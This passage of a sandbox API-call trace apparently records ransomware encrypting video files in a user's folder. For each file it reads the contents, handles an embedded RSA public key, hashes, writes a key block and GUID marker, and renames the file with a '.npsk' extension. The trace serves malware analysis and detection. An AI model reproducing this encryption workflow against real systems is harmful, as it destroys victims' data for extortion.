dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.062] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.064] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x2ce4, lpOverlapped=0x0) returned 1 [0216.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.065] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.066] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.066] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.066] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.066] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.066] GetLastError () returned 0x0 [0216.066] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.066] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.066] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.066] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.067] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.067] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.067] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2ce4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.067] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.067] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.067] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.068] CloseHandle (hObject=0x61c) returned 1 [0216.069] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hBKhvUWd9C_s.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hbkhvuwd9c_s.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hBKhvUWd9C_s.mkv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hbkhvuwd9c_s.mkv.npsk")) returned 1 [0216.070] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e3e8e00, ftCreationTime.dwHighDateTime=0x1d5e5c8, ftLastAccessTime.dwLowDateTime=0x2fd6edb0, ftLastAccessTime.dwHighDateTime=0x1d5e20b, ftLastWriteTime.dwLowDateTime=0x2fd6edb0, ftLastWriteTime.dwHighDateTime=0x1d5e20b, nFileSizeHigh=0x0, nFileSizeLow=0x913f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HLbm2n7XmHD8Lqe.avi", cAlternateFileName="HLBM2N~1.AVI")) returned 1 [0216.071] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HLbm2n7XmHD8Lqe.avi") returned=".avi" [0216.071] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HLbm2n7XmHD8Lqe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hlbm2n7xmhd8lqe.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.071] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=37183) returned 1 [0216.071] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.072] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x9119, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.073] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.074] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x913f, lpOverlapped=0x0) returned 1 [0216.075] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.075] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.075] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.075] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0216.076] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.076] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.076] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.076] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.077] GetLastError () returned 0x0 [0216.077] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.077] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0216.077] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.077] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.077] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.077] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.078] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x913f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.078] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.078] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.078] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.078] CloseHandle (hObject=0x61c) returned 1 [0216.079] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HLbm2n7XmHD8Lqe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hlbm2n7xmhd8lqe.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HLbm2n7XmHD8Lqe.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hlbm2n7xmhd8lqe.avi.npsk")) returned 1 [0216.081] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x303da940, ftCreationTime.dwHighDateTime=0x1d5e05f, ftLastAccessTime.dwLowDateTime=0x4b9b6a60, ftLastAccessTime.dwHighDateTime=0x1d5e0fa, ftLastWriteTime.dwLowDateTime=0x4b9b6a60, ftLastWriteTime.dwHighDateTime=0x1d5e0fa, nFileSizeHigh=0x0, nFileSizeLow=0x42cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iRXq1ON0Ej9yEAhP.swf", cAlternateFileName="IRXQ1O~1.SWF")) returned 1 [0216.081] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iRXq1ON0Ej9yEAhP.swf") returned=".swf" [0216.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iRXq1ON0Ej9yEAhP.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\irxq1on0ej9yeahp.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.081] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=17100) returned 1 [0216.081] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.083] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x42a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.083] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.085] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x42cc, lpOverlapped=0x0) returned 1 [0216.086] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.086] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.086] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.086] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0216.087] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.087] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.087] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.087] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.087] GetLastError () returned 0x0 [0216.087] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.087] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0216.088] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.088] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.088] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.088] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.088] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x42cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.088] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.089] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.089] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.089] CloseHandle (hObject=0x61c) returned 1 [0216.091] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iRXq1ON0Ej9yEAhP.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\irxq1on0ej9yeahp.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iRXq1ON0Ej9yEAhP.swf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\irxq1on0ej9yeahp.swf.npsk")) returned 1 [0216.096] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f8a8360, ftCreationTime.dwHighDateTime=0x1d5dd94, ftLastAccessTime.dwLowDateTime=0xe8d8add0, ftLastAccessTime.dwHighDateTime=0x1d5e044, ftLastWriteTime.dwLowDateTime=0xe8d8add0, ftLastWriteTime.dwHighDateTime=0x1d5e044, nFileSizeHigh=0x0, nFileSizeLow=0xf0f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j2myeAitBN1SML.avi", cAlternateFileName="J2MYEA~1.AVI")) returned 1 [0216.096] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j2myeAitBN1SML.avi") returned=".avi" [0216.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j2myeAitBN1SML.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j2myeaitbn1sml.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.096] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=61682) returned 1 [0216.096] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.098] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf0cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.098] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.100] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xf0f2, lpOverlapped=0x0) returned 1 [0216.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.101] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.102] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.102] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.102] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.102] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.102] GetLastError () returned 0x0 [0216.102] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.102] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.102] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.102] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.102] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.103] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, 